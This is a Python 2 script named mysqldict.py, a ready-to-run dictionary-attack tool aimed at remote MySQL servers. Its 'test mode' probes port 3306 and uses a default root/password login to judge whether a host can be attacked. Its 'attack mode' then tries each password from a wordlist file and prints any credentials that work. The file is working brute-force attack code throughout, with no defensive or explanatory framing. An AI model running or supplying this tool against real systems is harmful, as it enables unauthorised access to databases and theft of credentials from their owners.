#!/usr/bin/env python import sys import socket import os import re var = sys.version[0:5] try: import MySQLdb except: print "For mysqldict.py to function you need to download MySQLdb for python version %s" % var print "Please visit: http://sourceforge.net/projects/mysql-python/ or use your package manager to install it." sys.exit(1) def listhelp(): print """USAGE: ./mysqldict.py -h [TARGET] -u [USERNAME] -f [DICTIONARY FILE] -d [DB name] ##Attack Mode## ./mysqldict.py -t [TARGET] ##Test Mode#### -h{host}: Used for specifying the host you would like to perform the dictionary attack on. -u{username} Used for specifying the username you would like to use. -f{file}: Used for specifying the dictionary file you would like to use for the attack. -d{databasename}: Used for specifying the known database name of the MySQL database. -t{testmode}: Used for specifying if you would only want to test the target to see if it's susceptible to dictionary attacks. --help|-help: To display this help menu.""" sys.exit(2); if len(sys.argv) < 3 or len(sys.argv) > 9: listhelp(); if sys.argv[1] == "--help" or sys.argv[1] == "-help": listhelp(); if not re.match('[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}', sys.argv[2]): try: sys.argv[2] = socket.gethostbyname(sys.argv[2]) except socket.error: print "The domain name you've entered, %s does not appear to be valid!" % sys.argv[2] sys.exit(1) ###Test Module### if sys.argv[1] == "-t" and sys.argv[2]: print "mysqldict.py:" try: serverSocket = socket.socket() serverSocket.settimeout(0.50) var = serverSocket.connect((sys.argv[2], 3306)) if not var: print "Port 3306 on %s appears to be open.." % sys.argv[2] serverSocket.close() open="true" if open == "true": try: db = MySQLdb.connect(sys.argv[2], "root", "password", "test") db.close() except MySQLdb.Error, e: print "A connection has been made and here are the results of the test:" e = str(e.args[0]) if re.match('1045', e): print "This host is open to MySQL dictionary attacks!" sys.exit(0) elif re.match('1130', e): print "This host does not allow remote administration on MySQL" sys.exit(1130) elif re.match('\(1049,', e): print "The database name specified does not exist on the remote server but the password guessed is right!"; sys.exit(1049) else: print """There was a problem and here's the error message: %s""" % e sys.exit(255) except socket.error: print "Port 3306 on %s appears to be closed! Exiting!" % sys.argv[2] sys.exit(3) ###End of Test Module### ###The Main cheese###### if sys.argv[1] == "-h" and sys.argv[2] and sys.argv[3] == "-u" and sys.argv[4] and sys.argv[5] == "-f" and sys.argv[6] and sys.argv[7] == "-d" and sys.argv[8]: print "mysqldict.py:" try: serverSocket = socket.socket() serverSocket.settimeout(0.15) var = serverSocket.connect((sys.argv[2], 3306)) if not var: print "Port 3306 appears to be open on %s" % sys.argv[2] print "Now testing to see if the host is open for attack.." serverSocket.close() #Test the host to see if it's open for attack# try: var = MySQLdb.connect(sys.argv[2], 'root', 'password', 'test') var.close() except MySQLdb.Error, e: print "A connection has been made and here are the results of the test:" e = str(e.args[0]) if re.match('1045', e): print "This host is open to MySQL dictionary attacks! I am now continuing with a dictionary attack!" if not os.path.exists(sys.argv[6]): print "The dictionary file you specified, %s does not exist" % sys.argv[6] sys.exit(4) else: for i in file(sys.argv[6]): i = i.strip() try: var = MySQLdb.connect(sys.argv[2], sys.argv[4], i, sys.argv[8]) var.close() print "Host %s credentials are:" % sys.argv[2] print "Successful authentication made! USER: %s and PASS: %s" % (sys.argv[4], i) sys.exit(0) except MySQLdb.Error, e: e = str(e) if re.match('\(1049,', e): print "The username is %s and the password is %s, but the datebase name %s is wrong" % (sys.argv[4], i, sys.argv[8]) sys.exit(1049) print "Last password attempted was %s" % i elif re.match('1130', e): print "This host does not allow remote administration on MySQL." sys.exit(1130) except socket.error: print "Port 3306 does not appear to be open on %s" % sys.argv[2] print "Failed to even attempt dictionary attack." sys.exit(3)